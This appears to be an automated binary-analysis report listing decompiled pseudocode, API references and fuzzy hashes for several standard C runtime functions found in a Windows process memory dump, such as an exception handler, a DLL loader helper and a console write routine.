Instruction ID: 8d8e9774f017591f226a7826c610676df8816e8c70cee643cabe51d9437461db
Opcode Fuzzy Hash: cd821e2c44d2fd66c4ce904e60074f91c411499358efcbcca8f03438172143ae
Instruction Fuzzy Hash: D8018471A08305EBD7249FA1EC8CA6B7FBCEB656467084439FE01C2291DB61D404C671

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCF0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040BCF0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				intOrPtr _t79;
				signed int _t82;
				char _t84;
				intOrPtr _t87;
				intOrPtr _t96;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t105;
				void* _t107;
				void* _t115;

				_t76 = _a4;
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E00416797(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t99 = _t6;
				_push(_t99);
				_v20 = _t99;
				_v12 =  *(_t77 + 8) ^  *0x4228e8;
				E0040BCB0( *(_t77 + 8) ^  *0x4228e8);
				E0040CD4C(_a12);
				_t52 = _a4;
				_t107 = _t105 - 0x1c + 0x10;
				_t96 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t96 - 0xfffffffe;
					if(_t96 != 0xfffffffe) {
						E0040CF00(_t77, 0xfffffffe, _t99, 0x4228e8);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t96 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t82 = _v12;
							_t59 = _t96 + (_t96 + 2) * 2;
							_t79 =  *((intOrPtr*)(_t82 + _t59 * 4));
							_t60 = _t82 + _t59 * 4;
							_t83 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t84 = _v5;
								goto L7;
							} else {
								_t61 = E0040CEB0(_t83, _t99);
								_t84 = 1;
								_v5 = 1;
								_t115 = _t61;
								if(_t115 < 0) {
									_v16 = 0;
									L13:
									_push(_t99);
									E0040BCB0(_v12);
									goto L14;
								} else {
									if(_t115 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x419c4c;
											if(__eflags != 0) {
												_t72 = E00415F30(__eflags, 0x419c4c);
												_t107 = _t107 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t101 =  *0x419c4c; // 0x40a9f5
													 *0x4171ec(_a4, 1);
													 *_t101();
													_t99 = _v20;
													_t107 = _t107 + 8;
												}
												_t62 = _a4;
											}
										}
										E0040CEE4(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t96;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t96) {
											E0040CF00(_t64, _t96, _t99, 0x4228e8);
											_t64 = _a8;
										}
										_push(_t99);
										 *((intOrPtr*)(_t64 + 0xc)) = _t79;
										E0040BCB0(_v12);
										_t87 =  *((intOrPtr*)(_v24 + 8));
										E0040CEC8();
										asm("int3");
										__eflags = E0040CF17();
										if(__eflags != 0) {
											_t67 = E0040BF7C(_t87, __eflags);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E0040CF53();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t96 = _t79;
						} while (_t79 != 0xfffffffe);
						if(_t84 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

0x0040bcf7
0x0040bcfc
0x0040bd02
0x0040bd0e
0x0040bd10
0x0040bd16
0x0040bd16
0x0040bd1f
0x0040bd21
0x0040bd24
0x0040bd27
0x0040bd2f
0x0040bd34
0x0040bd37
0x0040bd3a
0x0040bd41
0x0040bd9d
0x0040bda0
0x0040bdaf
0x00000000
0x0040bdaf
0x00000000
0x0040bd43
0x0040bd43
0x0040bd49
0x0040bd4f
0x0040bd55
0x0040bdc0
0x0040bdc9
0x0040bd57
0x0040bd57
0x0040bd57
0x0040bd5d
0x0040bd60
0x0040bd63
0x0040bd66
0x0040bd69
0x0040bd6e
0x0040bd84
0x00000000
0x0040bd70
0x0040bd72
0x0040bd77
0x0040bd79
0x0040bd7c
0x0040bd7e
0x0040bd94
0x0040bdb4
0x0040bdb4
0x0040bdb8
0x00000000
0x0040bd80
0x0040bd80
0x0040bdca
0x0040bdcd
0x0040bdd3
0x0040bdd5
0x0040bddc
0x0040bde3
0x0040bde8
0x0040bdeb
0x0040bded
0x0040bdef
0x0040bdfc
0x0040be02
0x0040be04
0x0040be07
0x0040be07
0x0040be0a
0x0040be0a
0x0040bddc
0x0040be12
0x0040be17
0x0040be1a
0x0040be1d
0x0040be29
0x0040be2e
0x0040be2e
0x0040be31
0x0040be35
0x0040be38
0x0040be45
0x0040be48
0x0040be4d
0x0040be53
0x0040be55
0x0040be5a
0x0040be5f
0x0040be61
0x0040be6c
0x0040be63
0x0040be63
0x00000000
0x0040be63
0x0040be57
0x0040be57
0x0040be57
0x0040be59
0x0040be59
0x0040bd82
0x00000000
0x0040bd82
0x0040bd80
0x0040bd7e
0x00000000
0x0040bd87
0x0040bd87
0x0040bd89
0x0040bd90
0x00000000
0x0040bd92
0x00000000
0x0040bd90
0x0040bd55
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 0040BD27
___except_validate_context_record.LIBVCRUNTIME ref: 0040BD2F
_ValidateLocalCookies.LIBCMT ref: 0040BDB8
__IsNonwritableInCurrentImage.LIBCMT ref: 0040BDE3
_ValidateLocalCookies.LIBCMT ref: 0040BE38

Strings

csm, xrefs: 0040BDCD

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 859aa26956752a9f8403110642c8eec8ec11d0d97aaaf049b0883feefe3bd572
Instruction ID: 4f9585d4adc74af758f5eb08450ad8ba79214dd88cf6ef7be46d9d9a332929fe
Opcode Fuzzy Hash: 859aa26956752a9f8403110642c8eec8ec11d0d97aaaf049b0883feefe3bd572
Instruction Fuzzy Hash: C1417034A00209EBCF10DF69C884A9EBBB5EF44318F14817AE9146B3D2DB399941CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0041133D, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041133D(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x423b10 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x41b4e0 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E0040EA68(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E0040EA68(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x00411346
0x004113f0
0x0041134e
0x00411350
0x00411357
0x00411359
0x0041135f
0x0041136c
0x00411381
0x00411385
0x004113d7
0x004113d7
0x004113dc
0x004113e0
0x004113e3
0x004113e3
0x004113e9
0x004113eb
0x00411400
0x004113fb
0x004113ff
0x004113ff
0x004113ed
0x004113ed
0x00000000
0x004113ed
0x00411387
0x00411390
0x004113c7
0x004113c7
0x004113c9
0x004113cb
0x00000000
0x00000000
0x004113d3
0x00000000
0x004113d3
0x0041139a
0x0041139f
0x004113a4
0x00000000
0x00000000
0x004113ae
0x004113b3
0x004113b8
0x00000000
0x00000000
0x004113bd
0x004113c3
0x00000000
0x004113c3
0x00411364
0x00000000
0x00000000
0x00000000
0x0041136a
0x004113f9
0x00000000

Strings

api-ms-, xrefs: 00411394
ext-ms-, xrefs: 004113A8

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 6d61112a7cd760eb8da0dcffd8f3c0aca25ada070fe3ea4630b1bd0f309ae50a
Instruction ID: c6fcdb2bba9d4fa2456b7cf10db20705bf31928e08adfc7ca0fd2f1b27c35f1e
Opcode Fuzzy Hash: 6d61112a7cd760eb8da0dcffd8f3c0aca25ada070fe3ea4630b1bd0f309ae50a
Instruction Fuzzy Hash: 4D213B31B01318E7EB224B65DC80BDB36689B01760F210123EE22E77A4D738DD40C6D9

Uniqueness

Uniqueness Score: -1.00%

Function 00410D2A, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410D2A(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00410CF2(_t45, 7);
					E00410CF2(_t45 + 0x1c, 7);
					E00410CF2(_t45 + 0x38, 0xc);
					E00410CF2(_t45 + 0x68, 0xc);
					E00410CF2(_t45 + 0x98, 2);
					E0040F096( *((intOrPtr*)(_t45 + 0xa0)));
					E0040F096( *((intOrPtr*)(_t45 + 0xa4)));
					E0040F096( *((intOrPtr*)(_t45 + 0xa8)));
					E00410CF2(_t45 + 0xb4, 7);
					E00410CF2(_t45 + 0xd0, 7);
					E00410CF2(_t45 + 0xec, 0xc);
					E00410CF2(_t45 + 0x11c, 0xc);
					E00410CF2(_t45 + 0x14c, 2);
					E0040F096( *((intOrPtr*)(_t45 + 0x154)));
					E0040F096( *((intOrPtr*)(_t45 + 0x158)));
					E0040F096( *((intOrPtr*)(_t45 + 0x15c)));
					return E0040F096( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00410d30
0x00410d35
0x00410d3e
0x00410d49
0x00410d54
0x00410d5f
0x00410d6d
0x00410d78
0x00410d83
0x00410d8e
0x00410d9c
0x00410daa
0x00410dbb
0x00410dc9
0x00410dd7
0x00410de2
0x00410ded
0x00410df8
0x00000000
0x00410e08
0x00410e0d

APIs

Part of subcall function 00410CF2: _free.LIBCMT ref: 00410D17

_free.LIBCMT ref: 00410D78

Part of subcall function 0040F096: HeapFree.KERNEL32(00000000,00000000,?,00410D1C,?,00000000,?,?,?,00410D43,?,00000007,?,?,00411169,?), ref: 0040F0AC
Part of subcall function 0040F096: GetLastError.KERNEL32(?,?,00410D1C,?,00000000,?,?,?,00410D43,?,00000007,?,?,00411169,?,?), ref: 0040F0BE

_free.LIBCMT ref: 00410D83
_free.LIBCMT ref: 00410D8E
_free.LIBCMT ref: 00410DE2
_free.LIBCMT ref: 00410DED
_free.LIBCMT ref: 00410DF8
_free.LIBCMT ref: 00410E03

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7029d4ee8d064ebcfdf5fb013aa3628984088100ce1006a569d1c91e8eca9d8a
Instruction ID: 14b0c5a341329e562a648b0bb9a0223dddc10e0fb7b6132a991e3005570e93b8
Opcode Fuzzy Hash: 7029d4ee8d064ebcfdf5fb013aa3628984088100ce1006a569d1c91e8eca9d8a
Instruction Fuzzy Hash: 41119D31981B14AAD530BBB2CC07FCB779D6F00304F404D3EB69B66493EAB9A5854A85

Uniqueness

Uniqueness Score: -1.00%

Function 03F60F7A, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 03F60F42: _free.LIBCMT ref: 03F60F67

_free.LIBCMT ref: 03F60FC8

Part of subcall function 03F5F2E6: HeapFree.KERNEL32(00000000,00000000,?,03F60F6C,?,00000000,?,?,?,03F60F93,?,00000007,?,?,03F613B9,?), ref: 03F5F2FC
Part of subcall function 03F5F2E6: GetLastError.KERNEL32(?,?,03F60F6C,?,00000000,?,?,?,03F60F93,?,00000007,?,?,03F613B9,?,?), ref: 03F5F30E

_free.LIBCMT ref: 03F60FD3
_free.LIBCMT ref: 03F60FDE
_free.LIBCMT ref: 03F61032
_free.LIBCMT ref: 03F6103D
_free.LIBCMT ref: 03F61048
_free.LIBCMT ref: 03F61053

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7029d4ee8d064ebcfdf5fb013aa3628984088100ce1006a569d1c91e8eca9d8a
Instruction ID: 3c4bf3e62f304c0522723391950e89309f74b0d47ce3c1df44ea24dd44d297bf
Opcode Fuzzy Hash: 7029d4ee8d064ebcfdf5fb013aa3628984088100ce1006a569d1c91e8eca9d8a
Instruction Fuzzy Hash: 59117F79949B45EAD570FBB0CC05FDBBB9C9F00700F908C68BB9EAE052DA26B9054750

Uniqueness

Uniqueness Score: -1.00%

Function 0041304C, Relevance: 9.3, APIs: 6, Instructions: 318
fileCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041304C(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, signed int _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				long _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				long _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				long _t235;
				struct _OVERLAPPED* _t243;
				signed int _t246;
				intOrPtr _t249;
				signed int _t252;
				signed int _t253;
				signed int _t255;
				struct _OVERLAPPED* _t256;
				intOrPtr _t258;
				void* _t262;
				long _t263;
				signed char _t264;
				signed int _t265;
				void* _t266;
				void* _t268;
				struct _OVERLAPPED* _t269;
				long _t270;
				signed int _t271;
				long _t275;
				signed int _t278;
				long _t279;
				struct _OVERLAPPED* _t280;
				signed int _t282;
				intOrPtr _t284;
				signed int _t286;
				signed int _t289;
				long _t290;
				long _t291;
				signed int _t292;
				intOrPtr _t293;
				signed int _t294;
				void* _t295;
				void* _t296;

				_t172 =  *0x4228e8; // 0xfc126c15
				_v8 = _t172 ^ _t294;
				_t174 = _a8;
				_t263 = _a12;
				_t282 = (_t174 & 0x0000003f) * 0x38;
				_t246 = _t174 >> 6;
				_v112 = _t263;
				_v84 = _t246;
				_v80 = _t282;
				_t284 = _a16 + _t263;
				_v116 =  *((intOrPtr*)(_t282 +  *((intOrPtr*)(0x423908 + _t246 * 4)) + 0x18));
				_v104 = _t284;
				_t178 = GetConsoleCP();
				_t243 = 0;
				_v124 = _t178;
				E0040E96C( &_v72, _t263, 0);
				asm("stosd");
				_t249 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t249;
				asm("stosd");
				asm("stosd");
				_t275 = _v112;
				_v40 = _t275;
				if(_t275 >= _t284) {
					L52:
					__eflags = _v60 - _t243;
				} else {
					_t286 = _v92;
					while(1) {
						_v47 =  *_t275;
						_v76 = _t243;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x423908 + _v84 * 4));
						_v52 = _t186;
						if(_t249 != 0xfde9) {
							goto L23;
						}
						_t265 = _v80;
						_t212 = _t186 + 0x2e + _t265;
						_t256 = _t243;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t256)) != _t243) {
							_t256 =  &(_t256->Internal);
							if(_t256 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t278 = _v104 - _t213;
						_v44 = _t256;
						if(_t256 <= 0) {
							_t258 =  *((char*)(( *_t213 & 0x000000ff) + 0x423028)) + 1;
							_v52 = _t258;
							__eflags = _t258 - _t278;
							if(_t258 > _t278) {
								__eflags = _t278;
								if(_t278 <= 0) {
									goto L44;
								} else {
									_t290 = _v40;
									do {
										_t266 = _t265 + _t243;
										_t216 =  *((intOrPtr*)(_t243 + _t290));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t266 +  *((intOrPtr*)(0x423908 + _v84 * 4)) + 0x2e)) = _t216;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									goto L43;
								}
							} else {
								_t279 = _v40;
								__eflags = _t258 - 4;
								_v144 = _t243;
								_t260 =  &_v144;
								_v140 = _t243;
								_v56 = _t279;
								_t219 = (0 | _t258 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t265 + _v52 + 0x2e) & 0x000000ff) + 0x423028)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t256;
							_v52 = _t229;
							if(_t229 > _t278) {
								__eflags = _t278;
								if(_t278 > 0) {
									_t291 = _v40;
									do {
										_t268 = _t265 + _t243 + _t256;
										_t231 =  *((intOrPtr*)(_t243 + _t291));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t268 +  *((intOrPtr*)(0x423908 + _v84 * 4)) + 0x2e)) = _t231;
										_t256 = _v44;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									L43:
									_t286 = _v92;
								}
								L44:
								_t289 = _t286 + _t278;
								__eflags = _t289;
								L45:
								__eflags = _v60;
								_v92 = _t289;
							} else {
								_t269 = _t243;
								if(_t256 > 0) {
									_t293 = _v108;
									do {
										 *((char*)(_t294 + _t269 - 0xc)) =  *((intOrPtr*)(_t293 + _t269));
										_t269 =  &(_t269->Internal);
									} while (_t269 < _t256);
									_t229 = _v52;
								}
								_t279 = _v40;
								if(_t229 > 0) {
									E0040B4E0( &_v16 + _t256, _t279, _v52);
									_t256 = _v44;
									_t295 = _t295 + 0xc;
								}
								if(_t256 > 0) {
									_t270 = _v44;
									_t280 = _t243;
									_t292 = _v80;
									do {
										_t262 = _t292 + _t280;
										_t280 =  &(_t280->Internal);
										 *(_t262 +  *((intOrPtr*)(0x423908 + _v84 * 4)) + 0x2e) = _t243;
									} while (_t280 < _t270);
									_t279 = _v40;
								}
								_v136 = _t243;
								_v120 =  &_v16;
								_t260 =  &_v136;
								_v132 = _t243;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E00413DA4(_t260);
								_t296 = _t295 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t275 = _t279 + _v52 - 1;
									L31:
									_t275 = _t275 + 1;
									_v40 = _t275;
									_t193 = E0041056D(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
									_t295 = _t296 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t286 = _v88 - _v112 + _t275;
											_v92 = _t286;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t275 >= _v104) {
														goto L52;
													} else {
														_t249 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t286 = _t286 + 1;
															_v92 = _t286;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t252 = _v80;
						_t264 =  *((intOrPtr*)(_t252 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t275;
							_t188 = E00410E0E(_t264);
							_t253 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t253 * 2)) - _t243;
							if( *((intOrPtr*)(_t188 + _t253 * 2)) >= _t243) {
								_push(1);
								_push(_t275);
								goto L30;
							} else {
								_t202 = _t275 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t271 = _v84;
									_t255 = _v80;
									 *((char*)(_t255 +  *((intOrPtr*)(0x423908 + _t271 * 4)) + 0x2e)) = _v33;
									 *(_t255 +  *((intOrPtr*)(0x423908 + _t271 * 4)) + 0x2d) =  *(_t255 +  *((intOrPtr*)(0x423908 + _t271 * 4)) + 0x2d) | 0x00000004;
									_t289 = _t286 + 1;
									goto L45;
								} else {
									_t206 = E004124AE( &_v76, _t275, 2);
									_t296 = _t295 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t275 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t252 + _t186 + 0x2e));
							_v23 =  *_t275;
							_push(2);
							 *(_t252 + _v52 + 0x2d) = _t264 & 0x000000fb;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E004124AE();
							_t296 = _t295 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t294;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E0040A627(_v8 ^ _t294);
			}

0x00413057
0x0041305e
0x00413061
0x00413066
0x0041306e
0x00413071
0x00413075
0x00413078
0x00413082
0x0041308c
0x0041308e
0x00413091
0x00413094
0x0041309a
0x0041309c
0x004130a3
0x004130b0
0x004130b1
0x004130b4
0x004130b7
0x004130b8
0x004130b9
0x004130bc
0x004130c1
0x004133cd
0x004133cd
0x004130c7
0x004130c7
0x004130ca
0x004130cc
0x004130d2
0x004130d5
0x004130dc
0x004130e3
0x004130ec
0x00000000
0x00000000
0x004130f2
0x004130f8
0x004130fa
0x004130fc
0x004130ff
0x00413104
0x00413108
0x00000000
0x00000000
0x00000000
0x00413108
0x0041310d
0x00413110
0x00413112
0x00413117
0x004131c9
0x004131ca
0x004131cd
0x004131cf
0x0041337d
0x0041337f
0x00000000
0x00413381
0x00413381
0x00413384
0x00413387
0x00413390
0x00413393
0x00413394
0x00413398
0x0041339b
0x0041339b
0x00000000
0x0041339f
0x004131d5
0x004131d5
0x004131da
0x004131dd
0x004131e3
0x004131e9
0x004131f2
0x004131f5
0x004131f5
0x004131f6
0x004131f7
0x004131fa
0x004131fb
0x00000000
0x004131fb
0x0041311d
0x0041312c
0x0041312d
0x00413130
0x00413132
0x00413137
0x00413348
0x0041334a
0x0041334c
0x0041334f
0x00413354
0x0041335d
0x00413360
0x00413361
0x00413365
0x00413368
0x0041336b
0x0041336b
0x0041336f
0x0041336f
0x0041336f
0x00413372
0x00413372
0x00413372
0x00413374
0x00413374
0x00413378
0x0041313d
0x0041313d
0x00413141
0x00413143
0x00413146
0x00413149
0x0041314d
0x0041314e
0x00413152
0x00413152
0x00413155
0x0041315a
0x00413166
0x0041316b
0x0041316e
0x0041316e
0x00413173
0x00413175
0x00413178
0x0041317a
0x0041317d
0x00413180
0x00413183
0x0041318b
0x0041318f
0x00413193
0x00413193
0x00413199
0x0041319f
0x004131a2
0x004131aa
0x004131b1
0x004131b5
0x004131b6
0x004131b9
0x004131ba
0x004131fe
0x004131fe
0x00413202
0x00413203
0x00413208
0x0041320e
0x00000000
0x00413214
0x00413218
0x004132a1
0x004132a8
0x004132b0
0x004132b8
0x004132bd
0x004132c0
0x004132c5
0x00000000
0x004132cb
0x004132e0
0x004133c4
0x004133ca
0x00000000
0x004132e6
0x004132ef
0x004132f1
0x004132f7
0x00000000
0x004132fd
0x00413301
0x00413337
0x0041333a
0x00000000
0x00413340
0x00413340
0x00000000
0x00413340
0x00413303
0x00413305
0x00413307
0x00413320
0x00000000
0x00413326
0x0041332a
0x00000000
0x00413330
0x00413330
0x00413333
0x00413334
0x00000000
0x00413334
0x0041332a
0x00413320
0x00413301
0x004132f7
0x004132e0
0x004132c5
0x0041320e
0x00413137
0x00000000
0x0041321f
0x0041321f
0x00413222
0x00413226
0x00413229
0x0041324b
0x0041324e
0x00413253
0x00413257
0x0041325b
0x00413289
0x0041328b
0x00000000
0x0041325d
0x0041325d
0x00413260
0x00413263
0x00413266
0x004133a1
0x004133a4
0x004133b1
0x004133bc
0x004133c1
0x00000000
0x0041326c
0x00413273
0x00413278
0x0041327b
0x0041327e
0x00000000
0x00413284
0x00413284
0x00000000
0x00413284
0x0041327e
0x00413266
0x0041322b
0x00413232
0x00413237
0x0041323d
0x0041323f
0x00413246
0x0041328c
0x0041328f
0x00413290
0x00413295
0x00413298
0x0041329b
0x00000000
0x00000000
0x00000000
0x00000000
0x0041329b
0x00000000
0x00413229
0x004130ca
0x004133d0
0x004133d0
0x004133d2
0x004133d5
0x004133d5
0x004133d5
0x004133d5
0x004133e7
0x004133e9
0x004133ea
0x004133eb
0x004133f5

APIs

GetConsoleCP.KERNEL32(?,00000007,00000000), ref: 00413094
__fassign.LIBCMT ref: 00413273
__fassign.LIBCMT ref: 00413290
WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004132D8
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00413318
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004133C4

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 04087ad3b52c22329250a36225f0ba383bdc7170d2c24e87eec5c1182f1552ce
Instruction ID: c780fc2c3303c60b752c8a0d916e7b29dfe4eed8669ed26eb6ccae745bb6fe2a
Opcode Fuzzy Hash: 04087ad3b52c22329250a36225f0ba383bdc7170d2c24e87eec5c1182f1552ce
Instruction Fuzzy Hash: 06D18E71E0025C9FCF15CFA8C9809EDBBB5BF49315F28016AE855FB341D634AA86CB58

Uniqueness

Uniqueness Score: -1.00%

Function 03F6329C, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000007,00000000), ref: 03F632E4
__fassign.LIBCMT ref: 03F634C3
__fassign.LIBCMT ref: 03F634E0
WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03F63528
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 03F63568
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 03F63614

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 04087ad3b52c22329250a36225f0ba383bdc7170d2c24e87eec5c1182f1552ce
Instruction ID: 9c0ab0a22022fbd530fd380aa8b49521f7aef53a09a13a118d21a3ef42b9f494
Opcode Fuzzy Hash: 04087ad3b52c22329250a36225f0ba383bdc7170d2c24e87eec5c1182f1552ce
Instruction Fuzzy Hash: F3D19AB9E002599FCF15CFA8C8809EDFBB5AF49310F28016AE855BB351D731AA46CF54

Uniqueness

